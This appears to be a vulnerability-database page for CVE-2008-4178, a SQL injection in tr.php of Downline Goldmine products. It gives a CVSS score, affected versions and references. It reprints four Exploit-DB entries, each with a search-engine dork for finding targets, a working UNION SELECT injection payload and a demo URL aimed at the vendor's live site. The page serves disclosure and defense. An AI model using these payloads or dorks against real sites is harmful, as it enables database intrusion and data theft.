CVE-2008-4178
published 2008-09-23CVE-2008-4178: SQL injection vulnerability in tr.php in DownlineGoldmine Special Category Addon, Downline Builder Pro, New Addon, and Downline Goldmine Builder allows remote…
PriorityP345high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
3.38%
87.3th percentile
SQL injection vulnerability in tr.php in DownlineGoldmine Special Category Addon, Downline Builder Pro, New Addon, and Downline Goldmine Builder allows remote attackers to execute arbitrary SQL commands via the id parameter. NOTE: some of these details are obtained from third party information.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| downline_goldmine | builder | — | — |
| downline_goldmine | builder | — | — |
| downline_goldmine | new_addon | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Downline Goldmine paidversion - SQL Injection
exploitdb·2008-11-02
CVE-2008-4178 Downline Goldmine paidversion - SQL Injection
Downline Goldmine paidversion - SQL Injection
---
paidversion (tr.php id) Remote SQL Injection Vulnerability
Author: Hussin X
Home : www.IQ-TY.com & www.TrYaG.cc
script : http://www.downlinegoldmine.com/
DorK : inurl:tr.php?id=
Exploit :
tr.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9,10,11,12,13--
Demo :
http://www.downlinegoldmine.com/paidversion/tr.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9,10,11,12,13--
Greetz : All my freind
# milw0rm.com [2008-11-02]
Exploit-DB
Downline Goldmine newdownlinebuilder - SQL Injection
exploitdb·2008-11-02
CVE-2008-4178 Downline Goldmine newdownlinebuilder - SQL Injection
Downline Goldmine newdownlinebuilder - SQL Injection
---
newdownlinebuilder (tr.php id) Remote SQL Injection Vulnerability
Author: Hussin X
Home : www.IQ-TY.com & www.TrYaG.cc
script : http://www.downlinegoldmine.com/
DorK : inurl:tr.php?id=
Exploit :
tr.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9,10,11,12,13--
Demo :
http://www.downlinegoldmine.com/newdownlinebuilder/tr.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9,10,11,12,13--
Greetz : All my freind
# milw0rm.com [2008-11-02]
Exploit-DB
Downline Goldmine Category Addon - SQL Injection
exploitdb·2008-11-01
CVE-2008-4178 Downline Goldmine Category Addon - SQL Injection
Downline Goldmine Category Addon - SQL Injection
---
Category Addon (tr.php id) Remote SQL Injection Vulnerability
Author: Hussin X
Home : www.IQ-TY.com & www.TrYaG.cc
script : http://www.downlinegoldmine.com/
DorK : inurl:tr.php?id=
Exploit :
tr.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9,10,11,12,13--
Demo :
http://www.downlinegoldmine.com/categoryaddon/tr.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9,10,11,12,13--
Greetz : All my freind
# milw0rm.com [2008-11-01]
Exploit-DB
Downline Goldmine Builder - SQL Injection
exploitdb·2008-11-01
CVE-2008-4178 Downline Goldmine Builder - SQL Injection
Downline Goldmine Builder - SQL Injection
---
Downline Goldmine Builder (tr.php id) Remote SQL Injection Vulnerability
Author: Hussin X
Home : www.IQ-TY.com & www.TrYaG.cc
script :http://www.downlinegoldmine.com/
DorK :inurl:tr.php?id=
Exploit :
tr.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9,10,11,12,13--
Demo :
http://www.downlinegoldmine.com/downlinebuilder/tr.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9,10,11,12,13--
Greetz : All my freind
# milw0rm.com [2008-11-01]
No writeups or analysis indexed.
http://packetstorm.linuxsecurity.com/0809-exploits/categoryaddon-sql.txthttp://packetstorm.linuxsecurity.com/0809-exploits/downline-sql.txthttp://packetstormsecurity.org/0809-exploits/newdownline-sql.txthttp://secunia.com/advisories/31812http://www.securityfocus.com/bid/31169http://www.vupen.com/english/advisories/2008/2992http://www.vupen.com/english/advisories/2008/2993http://www.vupen.com/english/advisories/2008/2994http://www.vupen.com/english/advisories/2008/2995https://exchange.xforce.ibmcloud.com/vulnerabilities/45128https://www.exploit-db.com/exploits/6946https://www.exploit-db.com/exploits/6947https://www.exploit-db.com/exploits/6950https://www.exploit-db.com/exploits/6951http://packetstorm.linuxsecurity.com/0809-exploits/categoryaddon-sql.txthttp://packetstorm.linuxsecurity.com/0809-exploits/downline-sql.txthttp://packetstormsecurity.org/0809-exploits/newdownline-sql.txthttp://secunia.com/advisories/31812http://www.securityfocus.com/bid/31169http://www.vupen.com/english/advisories/2008/2992http://www.vupen.com/english/advisories/2008/2993http://www.vupen.com/english/advisories/2008/2994http://www.vupen.com/english/advisories/2008/2995https://exchange.xforce.ibmcloud.com/vulnerabilities/45128https://www.exploit-db.com/exploits/6946https://www.exploit-db.com/exploits/6947https://www.exploit-db.com/exploits/6950https://www.exploit-db.com/exploits/6951
2008-09-23
Published